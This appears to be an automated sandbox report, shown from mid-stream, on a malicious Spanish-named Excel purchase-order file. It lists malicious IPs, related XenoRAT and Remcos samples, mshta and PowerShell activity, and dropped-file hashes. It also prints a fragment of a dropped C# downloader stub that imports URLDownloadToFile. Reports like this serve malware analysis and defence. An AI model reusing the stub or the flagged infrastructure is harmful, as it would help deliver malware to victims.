mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451006989.000000001AA4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://go.crpowershell.exe, 00000007.00000002.451390179.000000001C33B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
151.101.1.137 | unknown | United States | 54113 | FASTLYUS | true
172.245.142.60 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
54.150.207.131 | short.ruksk.com | United States | 16509 | AMAZON-02US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572123
Start date and time: 2024-12-10 06:56:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Sample name: Orden_de_Compra_Nmero_6782929219.xls
Detection: MAL
Classification: mal100.phis.troj.expl.evad.winXLS@38/51@23/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 13
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to French - France
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.17.201.1, 104.17.202.1
• Excluded domains from analysis (whitelisted): resc.cloudinary.com.cdn.cloudflare.net
• Execution Graph export aborted for target mshta.exe, PID 1972 because there are no executed function
• Execution Graph export aborted for target mshta.exe, PID 3592 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:57:44 | API Interceptor | 144x Sleep call for process: mshta.exe modified
00:57:50 | API Interceptor | 187x Sleep call for process: AcroRd32.exe modified
00:57:50 | API Interceptor | 220x Sleep call for process: powershell.exe modified
00:58:00 | API Interceptor | 17x Sleep call for process: wscript.exe modified
00:58:07 | API Interceptor | 43x Sleep call for process: RdrCEF.exe modified
                                                                                            FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.1.137
                                                                                            greatnew.docGet hashmaliciousRemcosBrowse
                                                                                            • 151.101.1.137
                                                                                            fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.1.137
                                                                                            7dcce5b76c8b17472d024758970a406bOrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            plb2ptcqcI.docGet hashmaliciousXenoRATBrowse
                                                                                            • 54.150.207.131
                                                                                            OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            dHrrqccwkL.docGet hashmaliciousXenoRATBrowse
                                                                                            • 54.150.207.131
                                                                                            zVUq6L4FrV.docGet hashmaliciousXenoRATBrowse
                                                                                            • 54.150.207.131
                                                                                            Estado de cuenta.xlsGet hashmaliciousXenoRATBrowse
                                                                                            • 54.150.207.131
                                                                                            Estado de cuenta.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            Estado_de_cuenta.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            Microsoft.docGet hashmaliciousUnknownBrowse
                                                                                            • 54.150.207.131
                                                                                            No context
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):270336
                                                                                            Entropy (8bit):0.0018885380473555064
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE+/c/ll:/M/xT02zkll
                                                                                            MD5:6C5E32A74F994CDF9BA610A99972FA44
                                                                                            SHA1:1EC094D5326F882E227CDD9F9D160346FC7A9C60
                                                                                            SHA-256:1F80C86D694F8EAA7A1EFB05EA60FAE2A7C8B7D37D0B455AEFCCB7E17D925DBC
                                                                                            SHA-512:7FD09578AE600B7861022F621C18BFC1399B0161AADC3B81B8A3A062B7A80D06966E2C56071F140BB8A7F850E822ED57C2B188DFF20650950F151A0BE183CBE6
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.156700048567531
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7R4UCQyq2PP2nKuAl9OmbnIFUt8OR4mBG1Zmw+OR4mBQRkwOP2nKuAl9OmbjLJ:7HCQyvWHAahFUt8OrBg/+OrBQR57HAae
                                                                                            MD5:3DCC9691DF6DFD5524BCB156289FF013
                                                                                            SHA1:2DDBF0114A86BABD152FAEEC15DA0234214B29AF
                                                                                            SHA-256:74D442188E8CFAD39ED9FE37608894F3786CDC05F983BF1CD466EB55034999CA
                                                                                            SHA-512:5C3214AFD441642E2A2329044E1CDDB722C351B900A200DEC735551B6A4AD2D7A6AF9F3A68293A26B545B33DBD1A04B6FB02DB9D7CD673142B8998024E52FB82
                                                                                            Malicious:false
                                                                                            Preview:2024/12/10-00:58:10.526 1412 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/10-00:58:10.529 1412 Recovering log #3.2024/12/10-00:58:10.529 1412 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):131072
                                                                                            Entropy (8bit):0.005597679101775777
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ImtVOM1xVlt/XSxdltIt/l:IiVfxlKxdXI1l
                                                                                            MD5:FD55D575475A6BD81B055F46FA34BA8B
                                                                                            SHA1:289A6344929F221E19D2F9097A5907FE42C03855
                                                                                            SHA-256:261CE45767DBF1E61AAF67C5EC1D75C2FF5C02681DF96897D5B0EC56A0F8C2AB
                                                                                            SHA-512:F2247D89C3268E838AE6F4BCDC1C4BB9C60E4F2E05B1763CD152811661A00B8BFC467F71009894676E38CE31229DF35F6FC9F2F19C2911698012D0594697F098
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):536
                                                                                            Entropy (8bit):5.169975207806005
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:T4RF0OidRuMgxg6dxs3yBFTtDcQAzidRuOPgxg601s3yBFDHpcR:kwOid8HxPs3yTTtyid8OPgx4s3yTDHk
                                                                                            MD5:B8D5CFADEFDDE17A6177F53C132EABA3
                                                                                            SHA1:1757EAA7D8F72C98FF9C23842A1C1A164B2F3C7A
                                                                                            SHA-256:02BAE4304F4B3FFC6524DF61E484E8C2290F667E367BE3CCDF2EDE3531C97CC3
                                                                                            SHA-512:FB1B1D3896F7CA63242DB377B6FF4E9A7F727A3BB9042C97347775963C95FD03481A4513A7D7F5AB71A39258ED2AF3A83B1925D68530975BEAA4FF1B7C67E941
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):9566
                                                                                            Entropy (8bit):5.225658272708332
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:0XA2P6Y6f76yx626OP6H6Q6y6nfs6ttRZ69tsu6jtG16RMX05F5yLk:0QAt0zvXkdvIfsutRZEtsuutG1gMknR
                                                                                            MD5:2E350FCDA512FFAFE08AE7B88E09374C
                                                                                            SHA1:DEB0E517C3170020C3A6AD13A901409B36167A86
                                                                                            SHA-256:3E28E24970A3E570728DBBED456D5A0061C2C823FDC31BD137B5C269F364C181
                                                                                            SHA-512:7841FC3DA6362AF2FDCB8151A7B8E7A2EA9954DEA7A459397513070A099776F46511948CC38A74B16AE902CDE302F19232089775884A2962693C101538CA8039
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426595650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):147131
                                                                                            Entropy (8bit):2.492026622529777
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:3NTBeJFFFFFFp7gDyWjrtpyxxxxxxVzS:JDy
                                                                                            MD5:802CD36BAA47F7B2EFA27526316E696B
                                                                                            SHA1:8972C43DF7F45EAF0D8DBAC99841840578EF62F2
                                                                                            SHA-256:530DFDBC82FFF19C1B58C46576E23938620D4A057B94240215CB69A272EDA271
                                                                                            SHA-512:F725AD70E86494095473F31887940671A5C530E2652B8F9B7F57726F8B49DA75A14103E834D8E3C0B6BF9309BB062F723BB8A8930CFD3D66BBCE53F7564FD0A8
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):15189
                                                                                            Entropy (8bit):5.0343247648743
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                                            MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                                            SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                                            SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                                            SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                                            Malicious:false
                                                                                            Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Preview:@...e...........................................................
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):197887
                                                                                            Entropy (8bit):2.103619706221418
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:4owZw9d6yfaqcQ6PHO/3g9a8GPcQ6PHQ0/3g9a8GBGl/Qcj/WqgO7fpR1MK95tio:4LwzQcHgODpqPvQ
                                                                                            MD5:012B83177846CE35F8AE1F6B304FF9C6
                                                                                            SHA1:AE49E4E85D2FE80A83D0AA6420C72246E8B5E17E
                                                                                            SHA-256:264FC1A50A0F37A599E8CB50572D99A78C493DA4837930A480253E04A5963FA9
                                                                                            SHA-512:D48BDF9A62E410254CF3074D7215F922E98D6D1EE0C936FFF9C3720A000BDC571758E19A5338B7AD76F70B851AAC641A7EABA09B92782D5E57E4921E368D2978
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].hta, Author: Joe Security
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (3203), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):153952
                                                                                            Entropy (8bit):3.8067197460998417
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:HJlofF4RJFAiJlofF4RJFNiJlofF4RJFl:HJlofeRJFAiJlofeRJFNiJlofeRJFl
                                                                                            MD5:5CE00A79A9F41D260446BFDCC6267ADF
                                                                                            SHA1:0B2B90BEB56C59916B98004B1444698538729822
                                                                                            SHA-256:EFAB5D21ED82F610BC5F1734B909A7E5C3A6C2ECEBB276DD03B4D5BAF8E9B058
                                                                                            SHA-512:D4DE7FE61F23CE7524ED3123319AC93F33AE1806BD426045CA9DF1FA9EE82CCA58AA314711BBDE6A6FFA2EEE98DC20CC5E4D80D2EC7ABB028BE0639944714FEE
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):1293620
                                                                                            Entropy (8bit):4.563127917199792
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                                            MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                                            SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                                            SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                                            SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):1293620
                                                                                            Entropy (8bit):4.563127917199792
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                                            MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                                            SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                                            SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                                            SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):1452584
                                                                                            Entropy (8bit):0.2563079623293435
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Yal/m/4sHoKnL8n/Ml/+B0n/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXl:Yemb2sZb
                                                                                            MD5:F4B0E1C03C7BB160B48CFFA6160E2CBA
                                                                                            SHA1:3B95941606219C0EAF5FDB78E67C7F10BF21390B
                                                                                            SHA-256:06FD47AFCD865FAAEEF47C91837DFE45A7F0EC9F67E233767F9A7386B00326F0
                                                                                            SHA-512:F44D02569287398C2F97F3FD0F302E58DAA66C646EAC3E05DE5CD6965A3F0E2C9A5446A89B237CE622FD5583937BE137E0FBD09E3ABF5FC7ADBE834CCF52A65F
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):109544
                                                                                            Entropy (8bit):4.282675970330063
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                                                                                            MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                                                                                            SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                                                                                            SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                                                                                            SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):44256
                                                                                            Entropy (8bit):3.15066292565687
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                                                                                            MD5:F1EC2E98B0F577B675156B13DCF94105
                                                                                            SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                                                                                            SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                                                                                            SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):1452584
                                                                                            Entropy (8bit):0.2562765619857971
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Yal/OGHWWmn/Ml/+f3n/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W1f:YeOkQsoXb
                                                                                            MD5:467157C2656371305C0BE8EC47FDE4A2
                                                                                            SHA1:5BC781040C3F1BEC75F46D6626B7625BD82D194F
                                                                                            SHA-256:3959559289FDB01337D3762E3729ED49E765B3C0968F361097F39018E5F7F79B
                                                                                            SHA-512:BC10E03F7E0598FB8D37CAAC99AB1FC348D491A8C7633DA78D79DEA0A6FE64121C0B895B5168D00558B4EC16286C61FDE32378D4E83FACC59D63CF5F91F13F29
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):44256
                                                                                            Entropy (8bit):3.147465798679962
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                                                                                            MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                                                                                            SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                                                                                            SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                                                                                            SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (369)
                                                                                            Category:dropped
                                                                                            Size (bytes):482
                                                                                            Entropy (8bit):3.72494092078817
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:V/DsYLDS81zusXXemMGtpjQXReKJ8SRHy4HHlkbZ/vNy:V/DTLDfurbXfHO3Ny
                                                                                            MD5:8C16810A9A149EE7B288951C6AFDFCD1
                                                                                            SHA1:4322374E8321E8A97AB6AF0B6A23BB3F016C9713
                                                                                            SHA-256:95C610A9E86321D9DEA63594D0D9C9CB72C5DC56EDF8F78F25736A76CAC0D949
                                                                                            SHA-512:0E37863619591FDD2CDE0AE8EAD71EF856695E299E9BB76266F1B40588D3F7E26521F7CB0BEDCFA2A0809224DC02B076D4A07A1D247B23ADB30E79CA5F626564
                                                                                            Malicious:false
                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace LUtJBV.{. public class gNw. {. [DllImport("urlMOn.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr leaFQHyg,string Txt,string lMM,uint eMnvlHQop,IntPtr kfbeumR);.. }..}.
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):369
                                                                                            Entropy (8bit):5.353990064384824
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fqtgGzxs7+AEszIP23fqtgQA:p37Lvkmb6KzitfWZEoita
                                                                                            MD5:2D499B7EE9A50E529376682F5A91C32F
                                                                                            SHA1:6F446711CCACC4326C0D4621F9394C229B119251
                                                                                            SHA-256:883A6A7CF9CA00325315A245194863B1AA736461CD101E6A6F789A1C425C4CD4
                                                                                            SHA-512:968D289ECA640BC296FE09FAF550714C48684EF1DDC7E6763C636344FDB008F3C6E8C447D710E55609D723801239EA8E138DE884A302CDF40A6969471B9C1763
                                                                                            Malicious:false
                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.0.cs"
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3072
                                                                                            Entropy (8bit):2.835463387250883
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:etGSSPBG5eM7p8y7MfukhCa0v81b+PtkZfXh2WqhkWI+ycuZhNHakSpPNnq:6BsM+lfFCv8t+uJXh2WEH1ulHa3Lq
                                                                                            MD5:81D547B190CD6FF8AA154A0A8B815BB0
                                                                                            SHA1:B42FF870BA61C8C708EEE67D07A0BA6CC6C61176
                                                                                            SHA-256:4D78287F940F604D34D1523624A5F2FA23530E361BCF869D7BEB58D0A9060E0E
                                                                                            SHA-512:C233F74B2BB9BD2D06314EA7E07775F8A691355AA56BADCA805EDEF9D5950CF6BCD29594027BA688848012EF2CCB4B5C034ACDC6FAD10FAED1537910F0E4FF1F
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):866
                                                                                            Entropy (8bit):5.388164162109802
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:AId3ka6KzimEoiJKaMD5DqBVKVrdFAMBJTH:Akka60imEoiJKdDcVKdBJj
                                                                                            MD5:FC782DB2AA90D21AE783D38E56D68BD9
                                                                                            SHA1:F8192A5FB9911BF5F0F4308B36A9C8B2CA403446
                                                                                            SHA-256:FBE562DC34DDA022147DF467097BE60DD7D25FB66392D74D5F1A4A0817144B33
                                                                                            SHA-512:06961D40E41361C921B622C0214AA9EB63FC28C5C7F2D9629EB4947A839B1AF609F501ED98946CF890EA396BBA3F05756978E0EE8A1554242C847334572E8B83
                                                                                            Malicious:false
